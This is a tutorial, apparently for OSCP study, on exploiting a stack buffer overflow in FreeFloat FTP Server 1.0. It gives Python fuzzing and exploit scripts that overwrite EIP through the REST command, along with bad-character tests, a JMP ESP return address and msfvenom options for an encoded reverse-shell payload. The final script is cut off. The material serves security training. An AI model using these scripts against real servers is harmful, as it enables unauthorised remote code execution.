Complete Guide to Stack Buffer Overflow (OSCP Preparation)
Introduction
Stack buffer overflow is a memory corruption vulnerability that occurs when a program writes more data to a buffer located on the stack than the buffer was allocated to hold, so that the excess data overflows into adjacent memory outside of the intended data structure.
This will often cause the program to crash and, if certain conditions are met, it could allow an attacker to gain remote control of the machine with the privileges of the user running the program, by redirecting the execution flow of the application to malicious code.
The purpose of this guide is to teach the basics of stack buffer overflow, especially for students preparing for the OSCP certification exam.
Stack Buffer Overflow Theory
Before diving into an actual attack, it is crucial to understand basic concepts of C programming such as memory, the stack, CPU registers, pointers and what happens behind the scenes, in order to take advantage of a memory corruption to compromise a system.
Memory
Normally, a process is allocated a certain amount of memory, not shared with other processes, which contains everything it requires to run, such as the code itself and any DLLs.
Whenever an executable is run, its code is loaded into memory so that it can perform all the tasks that it has been programmed to do. Because all of the instructions are loaded into the program’s memory, they can be changed, making the application perform unintended actions.
All variables in memory are stored using either little endian (for Intel x86 processors) or big endian (for PowerPC) format.
In little endian, the bytes of a value are stored in reverse order, least significant byte first. So for example:
- 0x032CFBE8 will be stored as “E8FB2C03”
- 0x7734BC0D will be stored as “0DBC3477”
- 0x0BADF00D will be stored as “0DF0AD0B”
This will come in useful when redirecting the application execution, as the address of the JMP ESP instruction will have to be written in reverse byte order in the exploit.
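The byte reversal described above can be reproduced with Python's standard struct module. This is a minimal Python 3 sketch (the scripts later in this guide are Python 2); the helper name to_little_endian is made up for illustration.

```python
import struct

def to_little_endian(address):
    """Pack a 32-bit address into the 4 bytes an x86 CPU stores in memory."""
    # "<" selects little endian, "I" an unsigned 32-bit integer
    return struct.pack("<I", address)

# The three example values listed in the text
for address in (0x032CFBE8, 0x7734BC0D, 0x0BADF00D):
    print(hex(address), "->", to_little_endian(address).hex().upper())
```

Using struct.pack instead of typing the bytes by hand avoids transposition mistakes when the return address is added to an exploit.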
The Stack
The stack is a section of memory that stores temporary data, such as local variables, function arguments and return addresses, each time a function is called.
The stack always grows downwards towards lower addresses as new information is added to it. The ESP CPU register points to the top of the stack, which is the lowest address currently in use, and anything below it is free memory that can be overwritten. Because return addresses are stored on the stack next to local buffers, it is often exploited by injecting malicious code into it.
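To make the idea concrete, here is a simplified Python 3 model of a single stack frame, not real process memory. The 16-byte buffer size, the saved EBP value and the function names are all assumptions chosen for illustration. It shows how a copy without a bounds check reaches the saved return address once the data exceeds the buffer.

```python
import struct

BUFFER_SIZE = 16  # hypothetical size of a local buffer

def build_frame(return_address):
    """Model a frame laid out from low to high addresses:
    [local buffer][saved EBP][saved return address]."""
    saved_ebp = struct.pack("<I", 0x0064FC00)  # arbitrary illustrative value
    return bytearray(BUFFER_SIZE) + saved_ebp + struct.pack("<I", return_address)

def unchecked_copy(frame, data):
    """Copy data from the start of the buffer with no length check."""
    frame[0:len(data)] = data
    return frame

def saved_return_address(frame):
    """Read back the 4 bytes that would be loaded into EIP on return."""
    return struct.unpack("<I", bytes(frame[BUFFER_SIZE + 4:BUFFER_SIZE + 8]))[0]

frame = build_frame(0x00401000)
unchecked_copy(frame, b"A" * 8)               # fits inside the buffer
print(hex(saved_return_address(frame)))       # return address untouched
unchecked_copy(frame, b"A" * 20 + b"BBBB")    # 20 bytes of filler, then 4 more
print(hex(saved_return_address(frame)))       # return address is now 0x42424242
```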
CPU Registers
Registers are CPU variables that store single values. There is a fixed number of registers, used for different purposes, and they all have a specific location in the CPU.
Registers can hold pointers to memory addresses containing instructions for the program to perform. This can be exploited by using a jump instruction to move to a different memory location containing malicious code.
Intel assembly has 8 general purpose and 2 special purpose 32-bit registers. Different compilers may use the registers differently; the uses listed below are those of Microsoft’s compiler:
Register | Type | Purpose |
EAX | General Purpose | Stores the return value of a function. |
EBX | General Purpose | No specific uses, often set to a commonly used value in a function to speed up calculations. |
ECX | General Purpose | Occasionally used as a function parameter and often used as a loop counter. |
EDX | General Purpose | Occasionally used as a function parameter, also used for storing short-term variables in a function. |
ESI | General Purpose | Used as a pointer, points to the source of instructions that require a source and destination. |
EDI | General Purpose | Often used as a pointer. Points to the destination of instructions that require a source and destination. |
EBP | General Purpose | Has two uses depending on compile settings, it is either the frame pointer or a general purpose register for storing of data used in calculations. |
ESP | General Purpose | Stores a pointer to the top of the stack, i.e. the lowest stack address currently in use. |
EIP | Special Purpose | Stores a pointer to the address of the instruction that the program is currently executing. After each instruction, a value equal to its size is added to EIP, meaning it points at the machine code for the next instruction. |
FLAGS | Special Purpose | Stores meta-information about the results of previous operations i.e. whether it overflowed the register or whether the operands were equal. |
Pointers
A pointer is a variable that stores a memory address as its value; in the context of this guide, that address will often correspond to an instruction the program will have to perform. The value stored at the memory address can be obtained by “dereferencing” the pointer.
They are used in buffer overflow attacks to redirect the execution flow to malicious code through a pointer that points at a JMP instruction.
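Pointers and dereferencing can be tried out safely from Python 3 with the standard ctypes module. The sketch below is only an illustration of the concept; the variable names are arbitrary.

```python
import ctypes

value = ctypes.c_uint32(0x0BADF00D)   # a 32-bit variable somewhere in memory
ptr = ctypes.pointer(value)           # a pointer holding that variable's address

address = ctypes.addressof(value)     # the memory address stored by the pointer
dereferenced = ptr.contents.value     # dereferencing: read the value at that address

print(hex(address), hex(dereferenced))
```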
Common Instructions
This section covers some of the most common assembly instructions, their purpose in a program and some example uses:
Instruction Type | Description | Example Instructions |
Pointers and Dereferencing | Since registers simply store values, they may or may not be used as pointers, depending on the information stored. If being used as a pointer, registers can be dereferenced, retrieving the value stored at the address being pointed to. | movq, movb |
Doing Nothing | The NOP instruction, short for “no operation”, simply does nothing. | NOP |
Moving Data Around | Used to move values and pointers. | mov, movsx, movzx, lea |
Math and Logic | Used for math and logic. Some are simple arithmetic operations and some are complex calculations. | add, sub, inc, dec, and |
Jumping Around | Used mainly to perform jumps to certain memory locations, with the operand holding the address to jump to. | jmp, call, ret, cmp, test |
Manipulating the Stack | Used for adding and removing data from the stack. | push, pop, pushaw |
Some of these instructions are used during the practical example in order to gain remote access to the victim machine.
Stack Buffer Overflow Process
Although applications require a custom exploit to be crafted in order to gain remote access, most stack buffer overflow exploits, at a high level, involve the following phases:
- Fuzzing the Application to Replicate the Crash
- Finding & Testing the EIP Offset
- Finding Shellcode Space
- Testing for Bad Characters
- Finding & Testing a JMP ESP Instruction Address
- Generating & Adding Shellcode & NOP Slides to the Script
- Gaining Remote Access
The next section will cover these phases in great detail, from both a theoretical and practical standpoint.
Practical Example
This practical example will demonstrate how to exploit a stack buffer overflow vulnerability that affected FreeFloat FTP Server 1.0, an FTP server application. According to the exploit’s author, the crash occurs when sending the following information to the server:
- USER + [arbitrary username]
- PASS + [arbitrary password]
- REST (used to restart a file transfer from a specified point) + 300+ bytes
The entire exploitation process will be conducted using Immunity Debugger, which is free.
A copy of the vulnerable executable along with the proof of concept exploit (in the form of a Metasploit module) can be found at this Exploit DB page.
Windows Defender Firewall may need to be disabled if using an external host to debug the application, as by default it does not allow incoming connections.
Crashing the application
First of all, we have to cause the application to crash, in order to confirm that there is a buffer overflow vulnerability and that it can be further exploited to gain remote access.
Once the FreeFloat FTP Server executable has been downloaded, it can be run by double-clicking it:
This will start the FTP server and open port 21 for incoming connections.
Starting the Immunity Debugger, selecting the File → Attach option to attach it to the FreeFloat FTP process:
Alternatively, the “Open” option can also be used to select an executable:
Once the debugger has been attached to the process, it will enter a pause state. In order to start its execution, the Debug → Run option can be used:
Alternatively, pressing F9 will achieve the same result:
Immunity Debugger uses the following panes to display information:
- Top-Left Pane – It contains the instruction offset, the original application code, its assembly instruction and comments added by the debugger.
- Bottom-Left Pane – It contains the hex dump of the application itself.
- Top-Right Pane – It contains the CPU registers and their current value.
- Bottom-Right Pane – It contains the memory stack contents.
Python can be used to generate a buffer of 300 A characters to test the crash:
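A minimal Python 3 sketch of that step is shown below; the helper name make_buffer is an assumption, and the printed string can be pasted after the REST command.

```python
def make_buffer(size, fill="A"):
    """Return a test buffer made of `size` repetitions of the fill character."""
    return fill * size

buffer = make_buffer(300)
print(buffer)
```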
Establishing a TCP connection with port 21 using Netcat, logging in with test/test and sending REST plus the buffer created using Python to cause the crash:
This has crashed the program and Immunity Debugger has reported an access violation error:
The EIP register was overwritten with 41414141, i.e. four of the 300 x41 bytes (x41 corresponds to A in ASCII) sent through Netcat:
Since EIP stores the address of the next instruction to be executed by the application and we established we can manipulate its value, this can be exploited by redirecting the flow of the program execution to the memory ESP points to, which can be injected with malicious code.
The fuzzing process can also be automated through the use of a Python fuzzer, by sending incremental amounts of data in order to identify exactly at which point the application will crash and therefore stop responding.
Below is an example Python fuzzer for the FreeFloat FTP application:
#Python 2 script
import sys
from socket import *
from time import sleep

size = 100 #defining an initial buffer size
while size < 500: #using a while loop to keep sending the buffer until it reaches 500 bytes
    try:
        print "\nSending evil buffer with %s bytes" % size
        buffer = "A" * size #defining the buffer as a bunch of As
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(("10.0.0.101", 21)) #establishing connection
        s.recv(2000)
        s.send("USER test\r\n") #sending username
        s.recv(2000)
        s.send("PASS test\r\n") #sending password
        s.recv(2000)
        s.send("REST " + buffer + "\r\n") #sending rest and buffer
        s.close() #closing the connection
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
        sleep(1) #waiting one second
        s.close() #closing the connection
        size += 100 #increasing the buffer size by 100
        sleep(10) #waiting 10 seconds before repeating the loop
    except: #if a connection can't be made, print an error and exit cleanly
        print "[*]Error in connection with server"
        sys.exit()
To connect to the application in a similar fashion to the test done through Netcat, the following script can be used:
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    buffer = "A" * 300 #defining the buffer as a bunch of As
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
Identifying the EIP offset
The next step required is to identify which part of the buffer that is being sent is landing in the EIP register, in order to then modify it to control the execution flow of the program. Because all that was sent was a bunch of As, at the moment there is no way to know what part has overwritten EIP.
The Metasploit msf-pattern_create tool can be used to create a unique, non-repeating pattern that replaces the A characters, making it possible to identify which part lands in EIP:
msf-pattern_create -l [pattern length]
Creating a pattern of 300 characters using msf-pattern_create to keep the same buffer length:
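For readers curious about what the tool produces, the pattern follows a simple rule: an uppercase letter, a lowercase letter and a digit, cycling the digit fastest. The Python 3 function below is an illustrative re-implementation under that assumption, not the Metasploit source; the name pattern_create is borrowed for readability.

```python
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern_create(length):
    """Return the first `length` characters of the Aa0Aa1Aa2... pattern.

    The sequence runs out after 26 * 26 * 10 three-character groups,
    so longer requests return a shorter string in this sketch.
    """
    chunks = []
    total = 0
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if total >= length:
            break
        chunks.append(upper + lower + digit)
        total += 3
    return "".join(chunks)[:length]

print(pattern_create(300))
```

Because every 4-byte window of the pattern occurs only once, whatever value ends up in EIP identifies a single position in the buffer.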
Adding the pattern to the buffer variable in the script, instead of sending the “A” characters:
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" #defining the buffer as a unique pattern
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
The unique pattern was sent instead of the A characters.
The application crashed with an access violation error as expected, but this time, the EIP register was overwritten with “41326941”.
The Metasploit msf-pattern_offset tool can then be used to find the EIP value in the pattern created earlier and calculate the exact EIP offset, i.e. the number of bytes that precede the ones landing in EIP, which in this case is 246.
msf-pattern_offset -l [pattern length] -q [EIP address]
The following Mona command can also be used to perform this step:
!mona findmsp -distance [pattern length]
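The offset lookup itself is a plain substring search once the EIP value is converted back to its in-memory byte order. The Python 3 sketch below is an illustrative stand-in for the tools above, not their actual implementation; both function names are assumptions, and the pattern generator follows the Aa0Aa1Aa2... scheme visible in the script.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern_create(length):
    """Build the Aa0Aa1Aa2... pattern and cut it to `length` characters."""
    triples = (u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    return "".join(triples)[:length]

def pattern_offset(eip_value, length):
    """Return the position of the bytes found in EIP, or -1 if they are absent."""
    # EIP shows the value as a number; memory holds it in little-endian order
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)

# 0x41326941 is stored as the bytes 41 69 32 41, i.e. the text "Ai2A"
print(pattern_offset(0x41326941, 300))
```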
Modifying the script to overwrite EIP with four “B” characters instead of the As in order to verify whether the last test was successful:
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    offset = "A" * 246 #defining the offset value
    EIP = "B" * 4 #EIP placeholder
    padding = "C" * (300 - len(offset) - len(EIP)) #adding padding to keep the same buffer size of 300 bytes
    buffer = offset + EIP + padding #assembling the buffer
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
As expected, the EIP register was overwritten with the four “B” characters:
Now that we have full control over EIP, it can be exploited to redirect the application execution to certain instructions.
Finding Available Shellcode Space
The purpose of this step is to find a suitable location in the memory for our shellcode to then redirect the program execution to it.
When the last script was executed, the C characters that were used to keep the buffer size as 300 overflowed into the memory ESP points to, so this could be a good place to insert the shellcode:
We can tell the C characters sent to the application landed in ESP from the fifth one onward because ESP’s address is 0064FBE8, which corresponds to the second four-byte group of Cs on the stack.
We now have to verify whether there is enough space inside ESP for the shellcode, which is what will be executed by the program in order to gain remote access.
A normal reverse shell payload is about 300-400 bytes, and because only 50 Cs were sent we cannot tell whether there is enough space for it in ESP.
Modifying the script, adding about 550 C characters to the script in a new shellcode variable:
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    offset = "A" * 246 #defining the offset value
    EIP = "B" * 4 #EIP placeholder
    shellcode = "C" * (800 - len(offset) - len(EIP)) #Shellcode placeholder using 550 Cs, for a total buffer of 800 bytes
    buffer = offset + EIP + shellcode #assembling the buffer
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
All the “C” characters that were sent by the script have overwritten ESP:
To calculate how many C characters made it into ESP, all we need to do is subtract the address ESP points to from the address where the Cs end.
Beginning of ESP:
End of the Cs:
Calculating the difference between the two memory addresses using Python, all of the C characters made it into ESP which makes it a suitable shellcode location.
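The subtraction can be sketched in Python 3 as follows. The ESP value is the one quoted earlier in this guide; the end address is a hypothetical placeholder and should be replaced with the value read from the stack pane. The 400-byte threshold reflects the upper end of the payload size mentioned above.

```python
def bytes_between(start_address, end_address):
    """Number of bytes from start_address up to, but not including, end_address."""
    return end_address - start_address

esp_start = 0x0064FBE8   # address held in ESP, as quoted in the text
end_of_cs = 0x0064FE0A   # hypothetical placeholder for where the Cs end

available = bytes_between(esp_start, end_of_cs)
print(available, "bytes available")
print("Enough for a 400 byte payload:", available >= 400)
```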
What if there isn’t enough space?
If there isn’t enough space at the address ESP points to for our shellcode, this can be circumvented by using a first stage payload. Since we should be able to overwrite at least the first few bytes at ESP, this will be enough to place an instruction there that jumps to a different register pointing to the shellcode.
If a different register points to the beginning of the buffer, for example ECX:
Then the opcode used to perform a JMP ECX instruction can be generated:
And added to the script, so that the code at ESP jumps to ECX:
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    shellcode = "C" * 200 #Shellcode placeholder, it has to fit in the 246 bytes before EIP
    offset = "A" * (246 - len(shellcode)) #padding so that EIP is still overwritten at byte 246
    EIP = "B" * 4 #EIP placeholder
    first_stage = "\xff\xe1" #defining first stage payload as the JMP ECX instruction, assuming ESP points right after EIP
    buffer = shellcode + offset + EIP + first_stage #assembling the buffer
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
In this scenario, the shellcode is added to the beginning of the buffer, since that is the memory the chosen register (ECX) points to.
So basically this is what happens when the exploit is run:
- The shellcode is written to the start of the buffer, which ECX points to
- The buffer causes the application to crash
- EIP is overwritten with the address of a JMP ESP instruction, which redirects the execution flow to ESP
- The JMP ECX instruction placed at ESP is executed, redirecting the execution to ECX
- The shellcode that ECX points to is then executed
Testing for Bad Characters
Some programs will treat certain characters as “bad”, meaning that if they come across one of them, the rest of the data sent to the application is corrupted or truncated, preventing the program from interpreting it properly. One character that is pretty much always considered bad is \x00, as it is the null byte that terminates strings in C, so anything after it is dropped.
In this phase all we have to do is identify whether there are any bad characters, so that we can later on remove them from the shellcode.
Modifying the script, adding all possible characters in hex format to a badchars variable and sending it instead of the shellcode placeholder:
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    offset = "A" * 246 #defining the offset value
    EIP = "B" * 4 #EIP placeholder
    badchars = (
        "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
        "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
        "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
        "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
        "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
        "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
        "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
        "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
        "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
        "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
        "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
        "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
        "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
        "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
        "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
        "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) #adding all possible characters
    buffer = offset + EIP + badchars #assembling the buffer
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
Right-clicking on the ESP value and selecting “Follow in Dump” to follow ESP in the application dump and see if all the characters sent made it there:
It looks like the characters stop displaying properly after \x09, which indicates that the next character (\x0A) is a bad character.
After removing \x0A from the badchars variable and following the same process again, this time the characters stopped after \x0C, so \x0D is also bad.
After also removing \x0D and repeating the process once more, all of the characters made it into the ESP dump, starting from \x01 all the way to \xFF, so the only bad characters are \x00, \x0A and \x0D.
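The manual comparison can also be expressed in code. The Python 3 sketch below assumes the bytes following ESP have been copied out of the debugger into a bytes object; the function names are made up for illustration, and the truncated dumps in the example simply imitate the two failed runs described above.

```python
def all_bytes(exclude=b"\x00"):
    """Every byte value from 0x00 to 0xFF except the excluded ones."""
    return bytes(b for b in range(256) if b not in exclude)

def first_bad_char(sent, dumped):
    """Return the first sent byte that is missing or altered in the dump, else None."""
    for index, byte in enumerate(sent):
        if index >= len(dumped) or dumped[index] != byte:
            return byte
    return None

# First run: the dump stops displaying correctly after 0x09
sent = all_bytes()
print(hex(first_bad_char(sent, sent[:9])))

# Second run, with 0x0A removed: the dump stops after 0x0C
sent = all_bytes(b"\x00\x0a")
print(hex(first_bad_char(sent, sent[:11])))
```

Only the first mismatch is reported because a bad character usually truncates or corrupts everything after it, which is why the test is repeated after each removal.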
Finding a JMP ESP Return Address
Now that we can control EIP and found a suitable location for our shellcode (ESP), we need to redirect the execution flow of the program to ESP, so that it will execute the shellcode. In order to do this, we need to find a valid JMP ESP instruction address, which would allow us to “jump” to ESP.
For the address to be valid, the module containing it must not be compiled with ASLR support, so that the address stays the same every time the program runs, and the address cannot contain any of the bad characters found above, as the program needs to be able to interpret the address to perform the jump.
Restarting the application, re-attaching Immunity Debugger and using !mona modules command to find a valid DLL/module:
Finding a valid opcode for the JMP ESP instruction – FFE4 is what we require:
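On x86, a jump to a 32-bit register is encoded as the byte 0xFF followed by a second byte equal to 0xE0 plus the register's number. The Python 3 sketch below builds those two bytes; the function and dictionary names are assumptions, and it is meant as a quick cross-check rather than a replacement for an assembler.

```python
# Register numbers used by the x86 instruction encoding
REGISTER_CODES = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3,
                  "esp": 4, "ebp": 5, "esi": 6, "edi": 7}

def jmp_register_opcode(register):
    """Encode JMP <register> as 0xFF followed by 0xE0 + register number."""
    return bytes([0xFF, 0xE0 + REGISTER_CODES[register.lower()]])

print(jmp_register_opcode("esp").hex().upper())  # FFE4
print(jmp_register_opcode("ecx").hex().upper())  # FFE1
```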
Using the Mona find command to find valid pointers for the JMP ESP instruction:
!mona find -s string_to_search_for -m module_to_search_in
It looks like a valid pointer was found (0x7734BC0B), and it doesn’t contain any of the bad characters.
The following Mona command can also be used to find a valid pointer to a JMP ESP instruction address:
!mona jmp -r esp -cpb bad_characters
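A candidate address can also be double-checked by hand against the bad characters. The Python 3 sketch below is a minimal illustration with assumed names; the two rejected addresses are invented purely to show failing cases.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0d"  # bad characters identified in the previous phase

def address_is_usable(address, bad_chars=BAD_CHARS):
    """Return True if none of the address's four bytes is a bad character."""
    packed = struct.pack("<I", address)  # bytes as they will appear in the buffer
    return not any(byte in bad_chars for byte in packed)

print(address_is_usable(0x7734BC0B))  # address found above
print(address_is_usable(0x7734000B))  # made-up address containing a null byte
```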
Copying the address and searching for it in the application instructions using the “follow expression” Immunity feature to ensure it is valid:
It looks like it does correspond to a valid JMP ESP instruction address:
Changing the script replacing the “B” characters used for the EIP register with the newly found JMP ESP instruction address.
The EIP return address has to be entered the other way around as explained in the memory section, since little endian stores bytes in memory in reverse order.
import sys
from socket import *
from time import sleep

try:
    print "\n[+] Sending evil buffer..."
    offset = "A" * 246 #defining the offset value
    EIP = "\x0B\xBC\x34\x77" #JMP ESP return address (0x7734BC0B) in little endian
    shellcode = "C" * (800 - len(offset) - len(EIP)) #Shellcode placeholder using 550 Cs, for a total buffer of 800 bytes
    buffer = offset + EIP + shellcode #assembling the buffer
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #establishing connection
    s.recv(2000)
    s.send("USER test\r\n") #sending username
    s.recv(2000)
    s.send("PASS test\r\n") #sending password
    s.recv(2000)
    s.send("REST " + buffer + "\r\n") #sending rest and buffer
    s.close()
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("10.0.0.101", 21)) #an additional connection is needed for the crash to occur
    sleep(1) #waiting one second
    s.close() #closing the connection
    print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
    print "\n[+] Sending buffer: " + buffer
    print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*]Error in connection with server"
    sys.exit()
Breakpoints are used to stop the application execution when a certain memory location is reached and they can be used to ensure the JMP ESP instruction is working correctly.
Restarting the application, re-attaching Immunity Debugger and adding a breakpoint on the JMP ESP instruction address by hitting F2, then starting the program execution:
A breakpoint can also be added by right-clicking the memory location in the top-left pane, and selecting the Breakpoint → Memory, on access option:
Executing the script again:
When the application reaches the JMP ESP instruction, which is where the breakpoint was added, the program execution stops as instructed:
When single-stepping into the application execution using F7, this takes us to the C characters which are the placeholder for our shellcode.
Single-stepping can also be done through the Debug → Step into option:
Generating and Adding Shellcode
At this point we can completely control the execution flow of the program, so all that is left to do is add our shellcode to the exploit to trigger a reverse shell.
The shellcode can be generated using MSFvenom with the following flags:
- -p to specify the payload type, in this case the Windows reverse TCP shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format, in this case Python
- -b to specify the bad characters, in this case \x00, \x0A and \x0D
- -e to specify the encoder, in this case shikata_ga_nai
- -v to specify the name of the variable used for the shellcode, in this case simply “shellcode”
Because the shellcode is generated using an encoder (whose purpose is basic antivirus evasion), the program first needs to decode the shellcode before it can be run. The decoding process can overwrite a few bytes of memory around the start of the shellcode, and therefore a few NOPs are required in front of it to give the decoder enough room to work before the shellcode is executed by the program.
NOPs (No Operation instructions) have the opcode 0x90 and simply pass execution to the next instruction, i.e. they let the CPU “slide” through them until the shellcode is reached, which is why a sequence of them is called a NOP slide.
Adding the shellcode to the script, along with a slide of 20 NOPs at the beginning of it to avoid errors during the decoding phase:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "\x0B\xBC\x34\x77" #EIP Return Address
